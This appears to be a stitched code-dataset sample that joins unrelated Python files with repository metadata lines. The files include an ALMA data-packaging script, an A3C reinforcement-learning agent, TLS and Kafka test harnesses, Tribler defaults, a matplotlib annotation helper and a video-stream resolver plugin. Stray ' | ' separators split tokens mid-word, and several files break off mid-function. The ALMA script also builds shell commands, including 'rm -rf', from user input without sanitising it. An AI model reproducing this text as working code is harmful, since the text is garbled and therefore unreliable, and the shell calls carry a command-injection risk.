datadict = {'mous':mousid}
mousid2=mousid.replace("___","://").replace("_","/")
for line in html:
line=line.split()
#print line[0],line[1],line[2],line[3],line[4]
if line[4]==mousid:
#print "found MOUS"
#print line[0]
datadict['code']=line[0]
datadict['sgous']=line[2]
datadict['gous']=line[3]
datadict['mous']= line[4]
if datadict.has_key('sbuids'):
datadict['sbuids'].append(line[9])
else:
datadict['sbuids']=[line[9]]
if datadict.has_key('sbnames'):
datadict['sbnames'].append(line[10])
else:
datadict['sbnames']=[line[10]]
response2 = urllib2.urlopen(dataurl2)
html2 = response2.read().splitlines()
response2 = None
for line2 in html2:
line2=line2.split("|")
if line2[2]=='SemiPass':
continue
if line2[0]==mousid2:
if datadict.has_key('ebuids'):
datadict['ebuids'].append(line2[1])
else:
datadict['ebuids']=[line2[1]]
return datadict
# -------------------------------------------------------------------- | ------------------------------
def Packaging(datadict, username, qa2_dir):
# --------------------------------------------------------------------------------------------------
'''
#Running the QA2 Packaging (creates the tarballs and directory to be checked by DRMs)
'''
import os
import glob
import subprocess
#moving to user's qa2 directory and checking if Packages directory is there -- if not, create it
os.chdir(qa2_dir)
i | f os.path.isdir('%s/Packages' % qa2_dir) == False:
os.mkdir('Packages')
os.chdir('Packages')
package_dir = os.getcwd()
#Copying in the scriptForPI.py
os.system('cp -f /users/thunter/AIV/science/qa2/scriptForPI.py %s/%s_%s' % (qa2_dir, datadict['code'], datadict['mous']))
#Getting the cycle number for the style to be used in the packager
if datadict['code'].startswith('2013'):
style = 'cycle2-nopipe'
#there are no projects that start with 2014, this was still Cycle 2 and all C2 projects start with 2013 (there was no call in 2014)
if datadict['code'].startswith('2015'):
style = 'cycle3-nopipe'
if datadict['code'].startswith('2016'):
style = 'cycle4-nopipe'
#writing instructions to run in CASA (these are CASA functions)
packaging_instructions = open('PackagingInstructions','a')
packaging_instructions.write('from QA2_Packaging_module import *\n')
packaging_instructions.write('QA_Packager(origpath=\'%s/%s_%s\', readme=\'%s/%s_%s/README.header.txt\', packpath=\'%s/Packages/%s\', gzip_caltables=True, style=\'%s\', mode=\'hard\', PIscript=\'%s/%s_%s/scriptForPI.py\')' % (qa2_dir, datadict['code'], datadict['mous'], qa2_dir, datadict['code'], datadict['mous'], qa2_dir, datadict['code'], style, qa2_dir, datadict['code'], datadict['mous']))
packaging_instructions.close()
subprocess.call(['casa -c PackagingInstructions'], shell=True)
#Running tarsplit (which requires directory name is a certain way), the arguments go 1.) name of output tar file 2.) name of the directory to tar
subprocess.call(['/home/casa/contrib/AIV/science/DSO/tarsplit.py -f -o %s_%s %s' % (datadict['code'], datadict['mous'], datadict['code'])], shell=True)
tarball_name = glob.glob('%s_%s*.tar' % (datadict['code'], datadict['mous']))
os.system('rm -rf %s' % datadict['code'])
os.system('rm %s.ticket.tar' % datadict['code'])
os.system('rm %s.ticket.zip' % datadict['code'])
#Removing some of the extra output
os.system('rm -f PackagingInstructions')
os.system('rm -f casa-*.log')
os.system('rm -f ipython-*.log')
return tarball_name
# --------------------------------------------------------------------------------------------------
def ProprietaryAccess(datadict, username, PI, qa2_dir):
# --------------------------------------------------------------------------------------------------
'''
This takes care of putting the SRDP (calibrated_final.ms) in the proprietary area for the PI to pickup
'''
import os
import glob
import sys
#substituting in the PI code
pi_code = PI
#creating a directory for this PI in the area they can download it (if it doesn't already exist)
os.chdir('/lustre/naasc/ALMA_Data_Delivery/proprietary/')
if os.path.isdir('%s' % pi_code) == False:
os.mkdir('%s' % pi_code)
#checking and creating/appending an .htaccess file
os.chdir('%s' % pi_code)
if os.path.isfile('.htaccess') == False:
htaccess = open('.htaccess', 'a')
htaccess.write('AuthType CAS\n')
htaccess.write('Require user %s %s dckim cbrogan aremijan ksharp cubach swood pmurphy teuben\n' % (pi_code, username))
htaccess.write('Order deny,allow\n')
htaccess.write('AuthName \"Authentication Required\"\n')
htaccess.close()
if os.path.isfile('.htaccess') == True:
#if the file exists, see if the current user is already listed for access
htaccess = open('.htaccess').readlines()
for line in htaccess:
if username in line:
continue #this means the user is already listed and nothing needs to be done
else: #their name needs to be added; so lets write a new file and add the name
if 'user' in line:
current_users = line
new_users = current_users.strip()+' %s' % username
new_htaccess = open('.htaccess_new', 'a')
new_htaccess.write('AuthType CAS\n')
new_htaccess.write(new_users+'\n')
new_htaccess.write('Order deny,allow\n')
new_htaccess.write('AuthName \"Authentication Required\"\n')
new_htaccess.close()
#putting the new file in place of the old one
os.system('mv -f .htaccess .htaccess_old')
os.system('mv -f .htaccess_new .htaccess')
#creating a directory in the PI area for this specific MOUS; in the case it does already exist (not sure why) then continue on
os.chdir('/lustre/naasc/ALMA_Data_Delivery/proprietary/%s' % pi_code)
if os.path.isdir('%s' % datadict['mous'].split('_')[-1]) == False:
os.mkdir('%s' % datadict['mous'].split('_')[-1])
os.chdir('%s' % datadict['mous'].split('_')[-1])
mous_dir = datadict['mous'].split('_')[-1]
delivery_path = os.getcwd()
#moving the calibrated_final.ms.tar into this directory
os.chdir('%s/%s_%s/Imaging' % (qa2_dir, datadict['code'], datadict['mous']))
os.system('tar -cvf calibrated_final.ms.tar calibrated_final.ms') #the calibrated_final.ms should already exist, now we need to tar it and move it
os.system('mv calibrated_final.ms.tar %s' % delivery_path)
#checking the directory and file are there:
if os.path.exists('/lustre/naasc/web/almadata/proprietary/%s/%s/calibrated_final.ms.tar' % (pi_code, mous_dir)) == False:
raw_input('Error: package not in delivery area')
else:
SRDP_path = '/lustre/naasc/web/almadata/proprietary/%s/%s/calibrated_final.ms.tar' % (pi_code, mous_dir)
return mous_dir, pi_code, SRDP_path
# --------------------------------------------------------------------------------------------------
#main
# --------------------------------------------------------------------------------------------------
import os
import webbrowser
# ---------------------------
#prerequisites
username = raw_input('What is your lustre username?:').strip()
mous = raw_input('What is the MOUS code? (from SCOPS-ticket):').strip()
PI = raw_input('What is the PI user ID? (from ALMA_Data_Delivery):').strip()
mousid=mous.replace(':','_').replace('/','_')
mous_dir = mousid.split('_')[-1]
datadict = ReadDataFromWeb(mou |
AlphaSmartDog/DeepLearningNotes | Note-6 A3CNet/Note-6.2 A3C与HS300指数择时/agent/framework.py | Python | mit | 6,700 | 0.001343 | import numpy as np
import tensorflow as tf
from agent.forward import Forward
from config import *
_EPSILON = 1e-6 # avoid nan
# local network for advantage actor-critic which are also know as A2C
class Framework(object):
def __init__(self, access, state_size, action_size, scope_name):
self.Access = access
self.action_size = action_size
self.action_space = list(range(action_size))
with tf.variable_scope(scope_name):
# placeholder
self.inputs = tf.placeholder(tf.float32, [None] + state_size, "states")
self.actions = tf.placeholder(tf.int32, [None], "actions")
self.targets = tf.placeholder(tf.float32, [None], "discounted_rewards")
# network interface
self.actor = Forward('actor')
self.critic = Forward('critic')
self.policy = tf.nn.softmax(self.actor(self.inputs, self.action_size))
self.value = self.critic(self.inputs, 1)
self.policy_step = tf.squeeze(self.policy, axis=0)
self.greedy_action = tf.argmax(self.policy_step)
# losses
self._build_losses()
# async framework
self._build_async_interface()
self._build_interface()
print('graph %s' % (str(scope_name)))
def _build_losses(self):
# value loss
targets = tf.expand_dims(self.targets, axis=1)
self.advantage = targets - self.value
self.value_loss = tf.reduce_mean(tf.square(self.advantage))
# policy loss
action_gather = tf.one_hot(self.actions, self.action_size)
policy_action = tf.reduce_sum(self.policy * action_gather,
axis=1, keep_dims=True)
log_policy_action = tf.log(policy_action + _EPSILON)
self.policy_loss = -tf.reduce_mean(
tf.stop_gradient(self.advantage) * log_policy_action)
# entropy loss
entropy_loss = tf.reduce_sum(
self.policy * tf.log(self.policy + _EPSILON),
axis=1, keep_dims=True)
self.entropy_loss = tf.reduce_mean(entropy_loss)
# regularization
self.actor_norm = tf.add_n(self.actor.get_regularization()) * ACTOR_NORM_BETA
self.critic_norm = tf.add_n(self.critic.get_regularization()) * CRITIC_NORM_BETA
# total loss
self.actor_loss = self.policy_loss + ENTROPY_BETA * self.entropy_loss + self.actor_norm
self.critic_loss = self.value_loss + self.critic_norm
# interface adjustment parameters
self.a_actor_loss = self.actor_loss
self.a_policy_mean = -tf.reduce_mean(log_policy_action)
self.a_policy_loss = self.policy_loss
self.a_entropy_loss = ENTROPY_BETA * self.entropy_loss
self.a_actor_norm = self.actor_norm
self.a_critic_loss = self.critic_loss
self.a_value_loss = self.value_loss
self.a_critic_norm = self.critic_norm
self.a_value_mean = tf.reduce_mean(self.value)
self.a_advantage = tf.reduce_mean(self.advantage)
def _build_interface(self):
self.a_interface = [self.a_actor_loss,
self.a_actor_grad,
self.a_policy_mean,
self.a_policy_loss,
self.a_entropy_loss,
self.a_actor_norm,
self.a_critic_loss,
self.a_critic_grad,
self.a_value_loss,
self.a_critic_norm,
self.a_value_mean,
self.a_advantage]
def _build_async_interface(self):
global_actor_params, global_critic_params = self.Access.get_trainable()
local_actor_params, local_critic_params = self.get_trainable()
actor_grads = tf.gradients(self.actor_loss, list(local_actor_params))
critic_grads = tf.gradients(self.critic_loss, list(local_critic_params))
# Set up optimizer with global norm clipping.
a | ctor_grads, self.a_actor_grad = tf.clip_by_global_norm(actor_grads, MAX_GRAD_NORM)
critic_grads, self.a_critic_grad = tf.clip_by_global_norm(critic_grads, MAX_GRAD_NORM)
# update | Access
actor_apply = self.Access.optimizer_actor.apply_gradients(
zip(list(actor_grads), list(global_actor_params)))
critic_apply = self.Access.optimizer_critic.apply_gradients(
zip(list(critic_grads), list(global_critic_params)))
self.update_global = [actor_apply, critic_apply]
# update ACNet
assign_list = []
for gv, lv in zip(global_actor_params, local_actor_params):
assign_list.append(tf.assign(lv, gv))
for gv, lv in zip(global_critic_params, local_critic_params):
assign_list.append(tf.assign(lv, gv))
self.update_local = assign_list
def get_trainable(self):
return [self.actor.get_variables(), self.critic.get_variables()]
def get_policy(self, sess, inputs):
return sess.run(self.policy, {self.inputs: inputs})
def get_stochastic_action(self, sess, inputs, epsilon=0.95):
# get stochastic action for train
if np.random.uniform() < epsilon:
policy = sess.run(self.policy_step,
{self.inputs: np.expand_dims(inputs, axis=0)})
return np.random.choice(self.action_space, 1, p=policy)[0]
else:
return np.random.randint(self.action_size)
def get_deterministic_policy_action(self, sess, inputs):
# get deterministic action for test
return sess.run(self.greedy_action,
{self.inputs: np.expand_dims(inputs, axis=0)})
def get_value(self, sess, inputs):
return sess.run(self.value, {self.inputs: inputs})
def train_step(self, sess, inputs, actions, targets):
feed_dict = {self.inputs: inputs,
self.actions: actions,
self.targets: targets}
sess.run(self.update_global, feed_dict)
def init_network(self, sess):
"""
init or update local network
:param sess:
:return:
"""
sess.run(self.update_local)
def get_losses(self, sess, inputs, actions, targets):
"""
get all loss functions of network
:param sess:
:param inputs:
:param actions:
:param targets:
:return:
"""
feed_dict = {self.inputs: inputs,
self.actions: actions,
self.targets: targets}
return sess.run(self.a_interface, feed_dict)
|
zuun77/givemegoogletshirts | codejam/2020/qual/test.py | Python | apache-2.0 | 167 | 0.011976 | f | rom __future__ import print_function
import sys
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwa | rgs)
print("Python version")
eprint(sys.version)
|
ktan2020/legacy-automation | win/Lib/site-packages/pip-1.3.1-py2.7.egg/pip/status_codes.py | Python | mit | 87 | 0 | SUCCESS | = 0
ERROR = 1
UNKNOWN_ERROR = 2
VIRTUALENV_NOT_FOUND = 3
NO_MATCHES_FOUND = 2 | 3
|
alexeblee/s2n | tests/integration/common/s2n_test_scenario.py | Python | apache-2.0 | 5,789 | 0.002937 | ##
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
#
"""
Most s2n integration tests are run against a variety of arguments.
A "scenario" represents a specific set of inputs, such as address,
cipher, version, etc.
"""
import itertools
import multiprocessing
import os
from enum import Enum as BaseEnum
from multiprocessing.pool import ThreadPool
class Enum(BaseEnum):
def __str__(self):
return self.name
@classmethod
def all(cls):
return cls
class Version(Enum):
SSLv3 = 30
TLS10 = 31
TLS11 = 32
TLS12 = 33
TLS13 = 34
class Mode(Enum):
client = 0
server = 1
def is_client(self):
return self is Mode.client
def is_server(self):
return self is Mode.server
def other(self):
return Mode.server if self.is_client() else Mode.client
class Cipher():
def __init__(self, name, min_version):
self.name = name
self.min_version = min_version
def valid_for(self, version):
if not version:
version = Version.default()
if version.value < self.min_version.value:
return False
if self.min_version is Version.TLS13:
return version.value >= Version.TLS13.value
return True
def __str__(self):
return self.name
@classmethod
def all(cls):
return ALL_CIPHERS_PER_LIBCRYPTO_VERSION[get_libcrypto()]
def get_libcrypto():
return str(os.getenv("S2N_LIBCRYPTO")).strip('"')
ALL_CIPHERS = [
Cipher("TLS_AES_256_GCM_SHA384", Version.TLS13),
Cipher("TLS_CHACHA20_POLY1305_SH | A256", Version.TLS13),
Cipher("TLS_AES_128_GCM_SHA256", Version.TLS13)
]
# Older Openssl and libressl do not support CHACHA20
LEGACY_COMPATIBLE_CIPHERS = list(filter(lambda x: "CHACHA20" not in x.name, ALL_CIPHERS))
ALL_CIPHERS_PER_LIBCRYPTO_VERSION = {
"openssl-1.1.1" : ALL_CIPHERS,
"openssl-1.0.2" : LEGACY_COMPATIBLE_CIPHERS,
"openssl-1.0.2-fips" : LEGACY_COMPATIB | LE_CIPHERS,
"libressl" : LEGACY_COMPATIBLE_CIPHERS,
}
ALL_CURVES = ["P-256", "P-384"]
class Scenario:
"""
Describes the configuration for a specific TLS connection.
"""
def __init__(self, s2n_mode, host, port, version=None, cipher=None, curve=None, s2n_flags=[], peer_flags=[]):
"""
Args:
s2n_mode: whether s2n should act as a client or server.
host: host to connect or listen to.
port: port to connect or listen to.
version: which TLS protocol version to use. If None, the implementation will
use its default.
cipher: which cipher to use. If None, the implementation will use its default.
s2n_flags: any extra flags that should be passed to s2n.
peer_flags: any extra flags that should be passed to the TLS implementation
that s2n connects to.
"""
self.s2n_mode = s2n_mode
self.host = host
self.port = port
self.version = version
self.cipher = cipher
self.curve = curve
self.s2n_flags = s2n_flags
self.peer_flags = peer_flags
def __str__(self):
version = self.version if self.version else "DEFAULT"
cipher = self.cipher if self.cipher else "ANY"
result = "Mode:%s %s Version:%s Curve:%s Cipher:%s" % \
(self.s2n_mode, " ".join(self.s2n_flags), str(version).ljust(7), self.curve, str(cipher).ljust(30))
return result.ljust(100)
def __create_thread_pool():
threadpool_size = multiprocessing.cpu_count() * 2 # Multiply by 2 since performance improves slightly if CPU has hyperthreading
threadpool = ThreadPool(processes=threadpool_size)
return threadpool
def run_scenarios(test_func, scenarios):
failed = 0
threadpool = __create_thread_pool()
results = {}
print("\tRunning scenarios: " + str(len(scenarios)))
for scenario in scenarios:
async_result = threadpool.apply_async(test_func, (scenario,))
results.update({scenario: async_result})
threadpool.close()
threadpool.join()
results.update((k, v.get()) for k,v in results.items())
# Sort the results so that failures appear at the end
sorted_results = sorted(results.items(), key=lambda x: not x[1].is_success())
for scenario, result in sorted_results:
print("%s %s" % (str(scenario), str(result).rstrip()))
if not result.is_success():
failed += 1
return failed
def get_scenarios(host, start_port, s2n_modes=Mode.all(), versions=[None], ciphers=[None], curves=ALL_CURVES, s2n_flags=[], peer_flags=[]):
port = start_port
scenarios = []
combos = itertools.product(versions, s2n_modes, ciphers, curves)
for (version, s2n_mode, cipher, curve) in combos:
if cipher and not cipher.valid_for(version):
continue
for s2n_mode in s2n_modes:
scenarios.append(Scenario(
s2n_mode=s2n_mode,
host=host,
port=port,
version=version,
cipher=cipher,
curve=curve,
s2n_flags=s2n_flags,
peer_flags=peer_flags))
port += 1
return scenarios
|
sslavic/kafka | tests/kafkatest/tests/client/client_compatibility_produce_consume_test.py | Python | apache-2.0 | 4,454 | 0.004041 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ducktape.mark import parametrize
from ducktape.utils.util import wait_until
from kafkatest.services.zookeeper import ZookeeperService
from kafkatest.services.kafka import KafkaService
from kafkatest.services.verifiable_producer import VerifiableProducer
from kafkatest.services.console_consumer import ConsoleConsumer
from kafkatest.tests.produce_consume_validate import ProduceConsumeValidateTest
from kafkatest.utils import is_int_with_prefix
from kafkatest.version import DEV_BRANCH, LATEST_0_10_0, LATEST_0_10_1, LATEST_0_10_2, LATEST_0_11_0, LATEST_1_0, LATEST_1_1, LATEST_2_0, LATEST_2_1, LATEST_2_2, LATEST_2_3, LATEST_2_4, KafkaVersion
class ClientCompatibilityProduceConsumeTest(ProduceConsumeValidateTest):
"""
These tests validate that we can use a new client to produce and consume from older brokers.
"""
def __init__(self, test_context):
""":type test_context: ducktape.tests.test.TestContext"""
super(ClientCompatibilityProduceConsumeTest, self).__init__(test_context=test_context)
self.topic = "test_topic"
self.zk = ZookeeperService(test_context, num_nodes=3)
self.kafka = KafkaService(test_context, num_nodes=3, zk=self.zk, topics={self.topic:{
| "partitions": 10,
| "replication-factor": 2}})
self.num_partitions = 10
self.timeout_sec = 60
self.producer_throughput = 1000
self.num_producers = 2
self.messages_per_producer = 1000
self.num_consumers = 1
def setUp(self):
self.zk.start()
def min_cluster_size(self):
# Override this since we're adding services outside of the constructor
return super(ClientCompatibilityProduceConsumeTest, self).min_cluster_size() + self.num_producers + self.num_consumers
@parametrize(broker_version=str(DEV_BRANCH))
@parametrize(broker_version=str(LATEST_0_10_0))
@parametrize(broker_version=str(LATEST_0_10_1))
@parametrize(broker_version=str(LATEST_0_10_2))
@parametrize(broker_version=str(LATEST_0_11_0))
@parametrize(broker_version=str(LATEST_1_0))
@parametrize(broker_version=str(LATEST_1_1))
@parametrize(broker_version=str(LATEST_2_0))
@parametrize(broker_version=str(LATEST_2_1))
@parametrize(broker_version=str(LATEST_2_2))
@parametrize(broker_version=str(LATEST_2_3))
@parametrize(broker_version=str(LATEST_2_4))
def test_produce_consume(self, broker_version):
print("running producer_consumer_compat with broker_version = %s" % broker_version)
self.kafka.set_version(KafkaVersion(broker_version))
self.kafka.security_protocol = "PLAINTEXT"
self.kafka.interbroker_security_protocol = self.kafka.security_protocol
self.producer = VerifiableProducer(self.test_context, self.num_producers, self.kafka,
self.topic, throughput=self.producer_throughput,
message_validator=is_int_with_prefix)
self.consumer = ConsoleConsumer(self.test_context, self.num_consumers, self.kafka, self.topic,
consumer_timeout_ms=60000,
message_validator=is_int_with_prefix)
self.kafka.start()
self.run_produce_consume_validate(lambda: wait_until(
lambda: self.producer.each_produced_at_least(self.messages_per_producer) == True,
timeout_sec=120, backoff_sec=1,
err_msg="Producer did not produce all messages in reasonable amount of time"))
|
Captain-Coder/tribler | Tribler/Core/defaults.py | Python | lgpl-3.0 | 2,390 | 0.001255 | """
Default values for configurable parameters of the Core.
Author(s): Arno Bakker, Bram Cohen, Egbert Bouman
"""
# WARNING:
# As we have release Tribler 4.5.0 you must now take into account that
# people have stored versions of these params on their disk. Make sure
# you change the version number of the structure and provide upgrade code
# such that your code won't barf because we loaded an older version from
# disk that does not have your new fields.
#
import sys
from collections import OrderedDict
DEFAULTPORT = 7760
#
#
# BT per download opts
#
# History:
# Version 2: as released in Tribler 4.5.0
# Version 3:
# Version 4: allow users to specify a download directory every time
# Version 6: allow users to overwrite the multifile destination
# Version 7: swift params
# Version 8: deleted many of the old params that were not used anymore (due to the switch to libtorrent)
# Version 9: remove swift
# Version 10: add default anonymous level
# Version 11: remove createmerkletorrent, torrentsigkeypairfilename, makehash_md5, makehash_crc32, makehash_sha1
# Version 12: remove thumb
# Version 13: remove super_seeder
# Version 15: add seeding ratio
# Version 16: added field whether the download has been manually stopped by the user and time added
dldefaults = OrderedDict()
# General download settings
dldefaults['download_defaults'] = OrderedDict()
dldefaults['download_defaults']['mode'] = 0
dldefaults['download_defaults']['hops'] = 0
dldefaults['download_defaults']['selected_files'] = | []
dldefaults['download_defaults']['correctedfilename'] = None
dldefaults['download_defaults']['safe_seeding'] = False
# Valid values: 'forever', 'never', 'ratio', 'time'
d | ldefaults['download_defaults']['user_stopped'] = False
dldefaults['download_defaults']['time_added'] = 0
dldefaults['download_defaults']['credit_mining'] = False
tdefdictdefaults = {}
tdefdictdefaults['comment'] = None
tdefdictdefaults['created by'] = None
tdefdictdefaults['announce'] = None
tdefdictdefaults['announce-list'] = None
tdefdictdefaults['nodes'] = None # mainline DHT
tdefdictdefaults['httpseeds'] = None
tdefdictdefaults['url-list'] = None
tdefdictdefaults['encoding'] = None
tdefmetadefaults = {}
tdefmetadefaults['version'] = 1
tdefmetadefaults['piece length'] = 0
TDEF_DEFAULTS = {}
TDEF_DEFAULTS.update(tdefdictdefaults)
TDEF_DEFAULTS.update(tdefmetadefaults)
|
vrk-kpa/ckanext-xroad_integration | ckanext/xroad_integration/auth.py | Python | agpl-3.0 | 501 | 0.003992 | from ckan.plugins.toolkit import check_access, NotAuthorized, _
def xroad_error_list(context, | data_dict):
if not data_dict.get('organization'):
return check_access('sysadmin', context)
else:
try:
check_access('organization_update', context, {"id": data_dict.get('organization')})
return {"success": True}
except NotAuthorized:
return {"success": False, "msg": _(u"User not authorized to view X-Road error | list for organization")}
|
J-Sorenson/annnotations-line2d | annotations_line2d.py | Python | cc0-1.0 | 20,221 | 0.009798 | # -*- coding: utf-8 -*-
"""
annotations_line2d module
Created on Thu Sep 10 21:51:23 2015
@author: James Sorenson
"""
import matplotlib
import matplotlib.pyplot as plt
# This is to prevent overlapping annotations from being dragged simultaneously
# due to the multi-threaded nature of the matplotlib gui.
import threading
###########################
# Globals
###########################
attr_name = 'annotations_line2d'
_event= None # Used for debugging
###########################
# Class definitions
###########################
class DraggableAnnotationLine2D(matplotlib.offsetbox.DraggableBase):
"""This class is like Matplotlib’s DraggableAnnotation, but this one actually works.
Apparently, the original class can't handle annotations that are created
using 'offset points' from a data point. This class ONLY works with those.
Left-click to move the annotation without changing the data point.
Middle-click to slide the annotation to a different data point.
Right-click to delete the annotation.
The original annotation artist is in self.ref_artist.
We save additional info in self.line, self.index, and self.formatter.
"""
# Class-level lock to make sure only ONE annotation is moved at a time.
# Due to QT's multi—threaded nature, it‘s best to use a real thread lock.
_drag_lock=threading.Lock()
_counter=0 # Just a counter to give each annotation a unique ID.
def __init__(self, ref_artist, line=None, index=None, formatter=None, use_blit=True):
# Use the base init (This isn‘t C++ where the parent is called automatically.)
super().__init__(ref_artist, use_blit=use_blit)
# Store the other parameters
self.line=line
self.index=index
self.formatter=formatter
# Create a unique ID for this annotation (for debugging)
DraggableAnnotationLine2D._counter += 1
DraggableAnnotationLine2D._counter %= 2**31 # Not too big
self.id = DraggableAnnotationLine2D._counter
#print('Init',self.id)
if formatter is not None:
# Get and set the text
self.ref_artist.set_text(self.formatter(line, index))
#Update the canvas to make sure the annotation is visible
self.canvas.draw()
def artist_picker(self, artist, event):
"""
Determines if the artist should enable move for this mouse button event
"""
# Make sure this only happens with a click. Ignore scroll.
# Left or Right click works on all of these annotations
# Middle click (slide) requires that line and index are assigned
if (event.button in (1,3)) or \
(event.button ==2 and self.line is not None and self.index is not None):
# Good action. We only want to drag if the cursor is inside the
# box, not the arrow and the area around it.
# contains(event) returns (bool,attr)
#print('Picked',self.id)
drag = self.ref_artist.get_bbox_patch().contains(event)
if drag[0]:
#Make sure no other annotation are dragging.
# wait=False means no block. True if a successful lock.
if DraggableAnnotationLine2D._drag_lock.acquire(False):
# Record the mouse button
self.button=event.button
#print('Claim',self.id)
return drag
# If we made it here, then we're not moving
return (False, None)
def save_offset(self):
"""
On button-down, this saves the current location of the annotation.
Annotation object is in self.ref_artist.
"""
#print('Save',self.id)
if self.button == 1:
# Left-click. Move the annotation while pointing at the same data.
# Get the starting position of the artist in points (relative to data point)
self.drag_start_text_points = self.ref_artist.get_position()
# Get the inverted transform so we can convert pixels to paints.
self.drag_trans_mat = self.ref_artist.get_transform().inverted().get_matrix()
elif self.button == 2:
# Middle-click. We need some additional information to slide the data.
self.xydata=self.line.get_xydata() #just makes it easier (this does NOT copy)
# we need the pixels of the starting data point (not the cursor)
self.drag_start_pixels = self.ref_artist.get_axes().transData.transform(self.ref_artist.xy)
# Get the translation from pixels to data for annotation.xy
self.drag_trans_pix2dat = self.ref_artist.get_axes().transData.inverted()
def update_offset(self, dx, dy):
"""
dx and dy is the total pixel offset from the point where the mouse
drag started.
"""
if self.button == 1: # Left—click
# Scale delta pixels to delta points using parts of annotation transform.
# The full transform includes the data offset, but set position already does that.
new_position=(self.drag_start_text_points[0] + dx * self.drag_trans_mat[0,0],
self.drag_start_text_points[1] + dy * self.drag_trans_mat[1,1])
# Apply as delta points from data point
self.ref_artist.set_position(new_position)
elif self.button == 2: # Middle—click
| # We may have a logarithmic scale, but update offset only gives us delta pixels.
# Add the delta to the starting pixels, then convert to data coordinates
pixels_dxy = matplotlib.numpy.array((dx,dy))
new_data_xy = self.drag_trans_pix2dat.transform(self.drag_start_pixels+pixels_dxy)
# D | etermine if the new data coordinates reach or exceed the next line data point.
index=self.index
while (index > 0) and (self.xydata[index-1][0] > new_data_xy[0]):
#Move left
index -= 1
while (index < self.xydata.shape[0] - 1) and (self.xydata[index+1][0] < new_data_xy[0]):
# Move right
index += 1
if index != self.index:
# we moved an index! Update the annotation
self.ref_artist.xy=self.xydata[index,:]
self.index=index
if self.formatter is not None:
# Update the text in the annotation
self.ref_artist.set_text(self.formatter(self.line, index))
def finalize_offset(self):
"""Called when the mouse button is released, if this was picked in the first place."""
#print('Finalize',self.id)
if self.button == 2 and self.formatter is not None:
# Print out annotation text for the user to copy/paste
self.print_annotation()
elif self.button == 3:
# Delete annotation
self.remove()
def on_release(self,event):
"""
Called when the mouse button is released, whether or not this was picked.
We extend this function so that we are guaranteed to release the thread lock.
"""
# Call the original
super().on_release(event)
#Everyone tries to remove the block, just in case the controlling annotation was removed.
try:
DraggableAnnotationLine2D._drag_lock.release()
except RuntimeError:
pass # Already released. Not a concern.
def print_annotation(self):
"""Does exactly what you think it does"""
print('Annotation: {0}, ind={1}\n{2}'.format(self.line.get_label(), self.index, self.ref_artist.get_text()))
def remove(self):
"""Disconnect and delete the annotation."""
#print('Remove',self.id)
self.disconnect() # Disconnect the callbacks
self.ref_artist.remove() # Delete the annotation artist
self.got_artist=False # Tell this class it no longer has an artist
self.canvas.draw() # Update the whole canvas so the annotation disappears
class AnnotationPicker(object):
|
ghostrocket/django-debug-toolbar-gae | tests/urls.py | Python | bsd-3-clause | 404 | 0.007426 | """
URLpatterns for the debug toolbar.
These sh | ould not be loaded explicitly; the debug toolbar middleware will patch
this into the urlconf for the request.
"""
from django.conf.urls.defaults import *
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# This pattern should be last to ensure tests still work
url(r'^execute_sql/$', 'tests.views.execute_sql'), |
)
|
VioletRed/script.module.urlresolver | lib/urlresolver/plugins/videohut.py | Python | gpl-2.0 | 5,173 | 0.007539 | """
urlresolver XBMC Addon
Copyright (C) 2011 t0mm0
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FO | R A PARTICULAR PURPOSE. See the
GNU General Public Li | cense for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
from t0mm0.common.net import Net
import urllib2, os
from urlresolver import common
from urlresolver.plugnplay.interfaces import UrlResolver
from urlresolver.plugnplay.interfaces import PluginSettings
from urlresolver.plugnplay import Plugin
import xbmcgui
from lib import unwise
import urllib
#SET ERROR_LOGO# THANKS TO VOINAGE, BSTRDMKR, ELDORADO
error_logo = os.path.join(common.addon_path, 'resources', 'images', 'redx.png')
class VideoHutResolver(Plugin, UrlResolver, PluginSettings):
implements = [UrlResolver, PluginSettings]
name = "videohut.to"
domains = [ "videohut.to" ]
def __init__(self):
p = self.get_setting('priority') or 100
self.priority = int(p)
self.net = Net()
self.pattern = 'http://www.(videohut.to)/(?:v\/|embed.php\?id=)([0-9a-z]+)'
def get_url(self, host, media_id):
return 'http://www.videohut.to/embed.php?id=%s' % (media_id)
def get_host_and_id(self, url):
r = re.search(self.pattern, url)
if r: return r.groups()
else: return False
def valid_url(self, url, host):
if self.get_setting('enabled') == 'false': return False
return re.match(self.pattern, url) or self.name in host
def __get_stream_url(self, media_id, filekey, error_num=0, error_url=None):
'''
Get stream url.
If previously found stream url is a dead link, add error params and try again
'''
if error_num > 0 and error_url:
_error_params = '&numOfErrors={0}&errorCode=404&errorUrl={1}'.format(
error_num,
urllib.quote_plus(error_url).replace('.', '%2E')
)
else:
_error_params = ''
#use api to find stream address
api_call = 'http://www.videohut.to/api/player.api.php?{0}&file={1}&key={2}{3}'.format(
'user=undefined&pass=undefined',
media_id,
urllib.quote_plus(filekey).replace('.', '%2E'),
_error_params
)
api_html = self.net.http_GET(api_call).content
rapi = re.search('url=(.+?)&title=', api_html)
if rapi:
return urllib.unquote(rapi.group(1))
return None
def __is_stream_url_active(self, web_url):
try:
header = self.net.http_HEAD(web_url)
if header.get_headers():
return True
return False
except:
return False
def get_media_url(self, host, media_id):
